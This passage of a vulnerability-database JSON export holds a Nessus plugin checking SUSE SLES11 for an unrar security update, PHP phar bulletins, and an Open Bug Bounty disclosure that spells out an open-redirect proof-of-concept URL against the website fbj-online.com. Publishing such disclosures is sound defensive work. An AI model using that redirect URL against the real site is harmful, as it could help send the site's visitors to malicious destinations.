script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:unrar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"unrar-5.6.1-5.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"unrar\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:suse_linux:unrar", "cpe:/o:novell:suse_linux:11"], "solution": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch slessp4-unrar-13542=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch dbgsp4-unrar-13542=1", "nessusSeverity": "Critical", "cvssScoreSource": "", "vpr": {"risk factor": "High", "score": "8.4"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2018-04-03T00:00:00", "vulnerabilityPublicationDate": "2017-06-22T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-29T00:59:11", "differentElements": ["vpr"], "edition": 9}], "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SUSE_SU-2017-1760-1.NASL", "FEDORA_2018-D2B08AA37F.NASL", "GENTOO_GLSA-201709-24.NASL", "SUSE_SU-2017-1745-1.NASL", "GENTOO_GLSA-201710-21.NASL", "SUSE_SU-2018-0809-1.NASL", "GENTOO_GLSA-201804-16.NASL", "OPENSUSE-2017-779.NASL", "OPENSUSE-2018-314.NASL", "SUSE_SU-2017-1763-1.NASL", "SUSE_SU-2017-1716-1.NASL", "SUSE_SU-2021-2834-1.NASL", "DEBIAN_DLA-1003.NASL", "FEDORA_2018-602B5345FA.NASL", "GENTOO_GLSA-201708-05.NASL", "OPENSUSE-2017-724.NASL", "MCAFEE_WEB_GATEWAY_SB10205.NASL", "ALA_ALAS-2018-976.NASL", "SUSE_SU-2018-0863-1.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201710-21", "GLSA-201709-24", "GLSA-201804-16", "GLSA-201708-05"]}, {"type": "cve", "idList": ["CVE-2017-12941", "CVE-2012-6706", "CVE-2017-12942", "CVE-2017-12938", "CVE-2017-12940"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-12941", "UB:CVE-2017-12942", "UB:CVE-2017-12938", "UB:CVE-2012-6706", "UB:CVE-2017-12940"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310875200", "OPENVAS:1361412562310874188", "OPENVAS:1361412562310891003", "OPENVAS:1361412562310874227", "OPENVAS:1361412562310851575", "OPENVAS:1361412562310851727", "OPENVAS:1361412562310811258"]}, {"type": "suse", "idList": ["SUSE-SU-2018:0809-1", "OPENSUSE-SU-2017:1797-1", "SUSE-SU-2017:1716-1", "SUSE-SU-2017:1745-1", "OPENSUSE-SU-2018:0825-1", "SUSE-SU-2017:1760-1", "SUSE-SU-2018:0863-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1003-1:FD9FD"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:AE476E9F8D29EFD3EB8A7650FA8A0572"]}, {"type": "exploitdb", "idList": ["EDB-ID:44402"]}, {"type": "fedora", "idList": ["FEDORA:F0C3560EA463", "FEDORA:682846030B04", "FEDORA:06420604AF9F"]}, {"type": "archlinux", "idList": ["ASA-201803-14"]}, {"type": "amazon", "idList": ["ALAS-2018-976"]}], "modified": "2021-09-01T01:15:58", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-01T01:15:58", "rev": 2}}, "objectVersion": "1.6", "pluginID": "108828", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0862-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108828);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6706\", \"CVE-2017-12938\", \"CVE-2017-12940\", \"CVE-2017-12941\", \"CVE-2017-12942\");\n\n script_name(english:\"SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for unrar to version 5.6.1 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a\n directory-traversal protection mechanism via vectors\n involving a symlink to the . directory, a symlink to the\n .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the\n EncodeFileName::Decode call within the\n Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the\n Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the\n Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=513804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=693890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6706/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12938/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12940/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12941/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12942/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180862-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?183f5d82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-unrar-13542=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-unrar-13542=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:unrar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"unrar-5.6.1-5.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"unrar\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:suse_linux:unrar", "cpe:/o:novell:suse_linux:11"], "solution": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch slessp4-unrar-13542=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch dbgsp4-unrar-13542=1", "nessusSeverity": "Critical", "cvssScoreSource": "", "vpr": {"risk factor": "High", "score": "7.4"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2018-04-03T00:00:00", "vulnerabilityPublicationDate": "2017-06-22T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.nessus.NessusBulletin", "robots.models.base.Bulletin"]}], "openbugbounty": [{"id": "OBB:399506", "type": "openbugbounty", "bulletinFamily": "bugbounty", "title": "fbj-online.com Open Redirect vulnerability ", "description": "##### Open Bug Bounty ID: OBB-399506\n\nDescription| Value \n---|--- \nAffected Website:| fbj-online.com \nOpen Bug Bounty Program:| Create your bounty program now. It's open and free. \nVulnerable Application:| Custom Code \nVulnerability Type:| Open Redirect / CWE-601 \nCVSSv3 Score:| 3.4 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N] \nRemediation Guide:| OWASP Open Redirect Cheat Sheet \n \n##### Vulnerable URL:\n \n \n http://www.fbj-online.com/?ads_click=1&data;=13542-13541-13540-13524-1&nonce;=564fc7cfd5&redir;=https://openbugbounty.org&c;_url=http%3A%2F%2Fwww.fbj-online.com%2Farchives%2F1992\n \n\n##### Coordinated Disclosure Timeline\n\nDescription| Value \n---|--- \nVulnerability Reported:| 8 November, 2017 00:19 GMT \nVulnerability Verified:| 8 November, 2017 00:22 GMT \nWebsite Operator Notified:| 8 November, 2017 00:22 GMT \nPublic Report Published[without any technical details]:| 8 November, 2017 00:22 GMT \nVulnerability Fixed:| 8 August, 2018 11:02 GMT \nPublic Disclosure: A security researcher can delete the report before public disclosure, afterwards the report cannot be deleted or modified anymore. The researcher can also postpone public disclosure date as long as reasonably required to remediate the vulnerability.| 8 December, 2017 00:19 GMT\n", "published": "2017-11-08T00:19:00", "modified": "2017-12-08T00:19:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.openbugbounty.org/reports/399506/", "reporter": "5389", "references": [], "cvelist": [], "lastseen": "2018-08-15T19:43:15", "history": [{"bulletin": {"id": "OBB:399506", "type": "openbugbounty", "bulletinFamily": "bugbounty", "title": "fbj-online.com Open Redirect vulnerability", "description": "On the 08.11.2017 security researcher reported a Open Redirect vulnerability affecting the fbj-online.com website via the Open Bug Bounty coordinated vulnerability disclosure program.\n\n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 8 November, 2017 00:19 GMT \nNotification sent to subscribers (without technical details)| 8 November, 2017 02:17 GMT \n \nIf you are the website owner or administrator please [contact the researcher](<https://www.openbugbounty.org/researchers/Chris5389/>) directly to get vulnerability details and proceed to coordinated disclosure.\n", "published": "2017-11-08T00:19:00", "modified": "2017-11-08T02:17:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.openbugbounty.org/reports/399506/", "reporter": "Chris5389", "references": [], "cvelist": [], "lastseen": "2017-11-08T21:00:35", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2017-11-08T21:00:35", "value": 5.0}}, "objectVersion": "1.4", "openbugbounty": {"patchStatus": "on hold", "mirror": ""}}, "lastseen": "2017-11-08T21:00:35", "differentElements": ["description", "modified", "openbugbounty", "title"], "edition": 1}, {"bulletin": {"id": "OBB:399506", "type": "openbugbounty", "bulletinFamily": "bugbounty", "title": "fbj-online.com Open Redirect vulnerability ", "description": "##### Open Bug Bounty ID: OBB-399506\n\nDescription| Value \n---|--- \nAffected Website:| fbj-online.com \nVulnerable Application:| Custom Code \nVulnerability Type:| Open Redirect / CWE-601 \nCVSSv3 Score:| 3.4 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N] \nRemediation Guide:| OWASP Open Redirect Cheat Sheet \n \n##### Vulnerable URL:\n \n \n http://www.fbj-online.com/?ads_click=1&data;=13542-13541-13540-13524-1&nonce;=564fc7cfd5&redir;=https://openbugbounty.org&c;_url=http%3A%2F%2Fwww.fbj-online.com%2Farchives%2F1992\n \n\n##### Coordinated Disclosure Timeline\n\nDescription| Value \n---|--- \nVulnerability Reported:| 8 November, 2017 00:19 GMT \nVulnerability Verified:| 8 November, 2017 00:22 GMT \nWebsite Operator Notified:| 8 November, 2017 00:22 GMT \nVulnerability Published:| 8 November, 2017 00:22 GMT[without any technical details] \nPublic Disclosure:| 6 February, 2018 00:19 GMT\n", "published": "2017-11-08T00:19:00", "modified": "2018-02-06T00:19:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.openbugbounty.org/reports/399506/", "reporter": "Chris5389", "references": [], "cvelist": [], "lastseen": "2018-03-15T00:42:55", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "openbugbounty": {"patchStatus": "unpatched", "mirror": "http://399506.openbounty.org/mirror/"}}, "lastseen": "2018-03-15T00:42:55", "differentElements": ["description", "modified", "openbugbounty", "reporter"], "edition": 2}], "viewCount": 2, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2018-08-15T19:43:15", "rev": 2}, "dependencies": {"references": [], "modified": "2018-08-15T19:43:15", "rev": 2}}, "objectVersion": "1.4", "openbugbounty": {"patchStatus": "patched", "mirror": "http://399506.openbounty.org/mirror/"}, "_object_type": "robots.models.openbugbounty.OpenbugbountyBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openbugbounty.OpenbugbountyBulletin"]}], "securityvulns": [{"id": "SECURITYVULNS:VULN:14753", "bulletinFamily": "software", "title": "PHP security vulnerabilities", "description": "PHAR extension DoS.", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32651"], "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "type": "securityvulns", "lastseen": "2021-06-08T19:08:49", "history": [{"bulletin": {"affectedSoftware": [{"name": "PHP", "operator": "eq", "version": "5.6"}], "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "PHAR extension DoS.", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-08-31T11:10:03", "references": [{"idList": ["ALAS-2015-602", "ALAS-2015-601"], "type": "amazon"}, {"idList": ["CVE-2015-7803", "CVE-2015-7804"], "type": "cve"}, {"idList": ["H1:103990", "H1:104008"], "type": "hackerone"}, {"idList": ["SECURITYVULNS:DOC:32651"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310806649", "OPENVAS:1361412562310806648", "OPENVAS:703380", "OPENVAS:1361412562310120520", "OPENVAS:1361412562310842508", "OPENVAS:1361412562310807000", "OPENVAS:1361412562311220201747", "OPENVAS:1361412562310703380", "OPENVAS:1361412562310120396", "OPENVAS:1361412562311220191984"], "type": "openvas"}, {"idList": ["RHSA-2016:0457"], "type": "redhat"}, {"idList": ["SUSE-SU-2016:1145-1", "SUSE-SU-2016:1638-1", "SUSE-SU-2016:1581-1"], "type": "suse"}, {"idList": ["DEBIAN:DSA-3380-1:F94D6", "DEBIAN:DLA-341-1:DA682"], "type": "debian"}, {"idList": ["USN-2786-1"], "type": "ubuntu"}, {"idList": ["SSA-2016-034-04"], "type": "slackware"}, {"idList": ["GLSA-201606-10"], "type": "gentoo"}, {"idList": ["ALA_ALAS-2015-602.NASL", "FREEBSD_PKG_C1DA8B756AEF11E59909002590263BF5.NASL", "UBUNTU_USN-2786-1.NASL", "PHP_5_6_14.NASL", "SUSE_SU-2016-0284-1.NASL", "PHP_5_5_30.NASL", "SLACKWARE_SSA_2016-034-04.NASL", "OPENSUSE-2016-100.NASL", "ALA_ALAS-2015-601.NASL", "DEBIAN_DSA-3380.NASL"], "type": "nessus"}, {"idList": ["C1DA8B75-6AEF-11E5-9909-002590263BF5"], "type": "freebsd"}, {"idList": ["F5:K17503", "SOL17503"], "type": "f5"}, {"idList": ["CLSA-2020:1605798462"], "type": "cloudlinux"}], "rev": 2}, "score": {"modified": "2018-08-31T11:10:03", "rev": 2, "value": 7.4, "vector": "NONE"}}, "hash": "5bebcb6b83df2b42d069178c1e9ea73c038f8703bc95cf2b81c683a8d0d17ff6", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "94aee96d0a33ff770af1ab8e308073f0", "key": "cvelist"}, {"hash": "c514412540c1e967450f03283e4ed180", "key": "references"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "5c799165d68e636bd0726587ae899c0d", "key": "description"}, {"hash": "6d2dcaed858380d54d5782ad38c55586", "key": "affectedSoftware"}, {"hash": "2c5cca82a8670da097919f6160833daf", "key": "reporter"}, {"hash": "b3b8db0e3c7acd6c3190db6f8e88e96b", "key": "href"}, {"hash": "d8f38bedae5c73d95ff296ba2bd86a44", "key": "modified"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "3a18a828bc11b79a70839be146b3b5a3", "key": "title"}, {"hash": "d54751dd75af2ea0147b462b3e001cd0", "key": "type"}, {"hash": "d8f38bedae5c73d95ff296ba2bd86a44", "key": "published"}], "history": [], "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "id": "SECURITYVULNS:VULN:14753", "immutableFields": [], "lastseen": "2018-08-31T11:10:03", "modified": "2015-11-02T00:00:00", "objectVersion": "1.5", "published": "2015-11-02T00:00:00", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32651"], "reporter": "BUGTRAQ", "title": "PHP security vulnerabilities", "type": "securityvulns", "viewCount": 212}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-08-31T11:10:03"}], "edition": 2, "hashmap": [{"key": "affectedSoftware", "hash": "1858c8bfb7eb8aace48fa57059397c29"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "94aee96d0a33ff770af1ab8e308073f0"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "5c799165d68e636bd0726587ae899c0d"}, {"key": "href", "hash": "b3b8db0e3c7acd6c3190db6f8e88e96b"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "c514412540c1e967450f03283e4ed180"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "3a18a828bc11b79a70839be146b3b5a3"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "8859a40c26baff900b73dab92cbb6fd72e9b8dcbbd9acc6d613b18d55563796e", "viewCount": 222, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["F5:K17503", "SOL17503"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-7803", "UB:CVE-2015-7804"]}, {"type": "cve", "idList": ["CVE-2015-7803", "CVE-2015-7804"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191984", "OPENVAS:1361412562311220201747", "OPENVAS:1361412562310806649", "OPENVAS:1361412562310120520", "OPENVAS:1361412562311220192438", "OPENVAS:1361412562310703380", "OPENVAS:703380", "OPENVAS:1361412562311220192649", "OPENVAS:1361412562310807000", "OPENVAS:1361412562310806648", "OPENVAS:1361412562310120396", "OPENVAS:1361412562310842508"]}, {"type": "nessus", "idList": ["ALA_ALAS-2015-602.NASL", "DEBIAN_DSA-3380.NASL", "EULEROS_SA-2019-2649.NASL", "PHP_5_5_30.NASL", "UBUNTU_USN-2786-1.NASL", "OPENSUSE-2016-100.NASL", "SUSE_SU-2016-1581-1.NASL", "FREEBSD_PKG_C1DA8B756AEF11E59909002590263BF5.NASL", "OPENSUSE-2016-157.NASL", "EULEROS_SA-2019-1984.NASL", "MACOSX_SECUPD2015-008.NASL", "9325.PRM", "SLACKWARE_SSA_2016-034-04.NASL", "EULEROS_SA-2019-2438.NASL", "SUSE_SU-2016-1638-1.NASL", "WEB_APPLICATION_SCANNING_98806", "GENTOO_GLSA-201606-10.NASL", "8956.PRM", "SUSE_SU-2016-0284-1.NASL", "MACOSX_10_11_2.NASL", "SUSE_SU-2016-1145-1.NASL", "PHP_5_6_14.NASL", "DEBIAN_DLA-341.NASL", "ALA_ALAS-2015-601.NASL", "PFSENSE_SA-15_08.NASL", "EULEROS_SA-2020-1747.NASL"]}, {"type": "freebsd", "idList": ["C1DA8B75-6AEF-11E5-9909-002590263BF5"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32651"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3380-1:F94D6", "DEBIAN:DLA-341-1:DA682"]}, {"type": "ubuntu", "idList": ["USN-2786-1"]}, {"type": "slackware", "idList": ["SSA-2016-034-04"]}, {"type": "hackerone", "idList": ["H1:104008", "H1:103990"]}, {"type": "amazon", "idList": ["ALAS-2015-602", "ALAS-2015-601"]}, {"type": "redhat", "idList": ["RHSA-2016:0457"]}, {"type": "suse", "idList": ["SUSE-SU-2016:1581-1", "SUSE-SU-2016:1145-1", "SUSE-SU-2016:1638-1"]}, {"type": "gentoo", "idList": ["GLSA-201606-10"]}, {"type": "cloudlinux", "idList": ["CLSA-2020:1605798462"]}], "modified": "2021-06-08T19:08:49", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-06-08T19:08:49", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "php", "operator": "eq", "version": "5.6"}], "immutableFields": [], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32651", "bulletinFamily": "software", "title": "[USN-2786-1] PHP vulnerabilities", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. &#40;CVE-2015-7803, CVE-2015-7804&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n 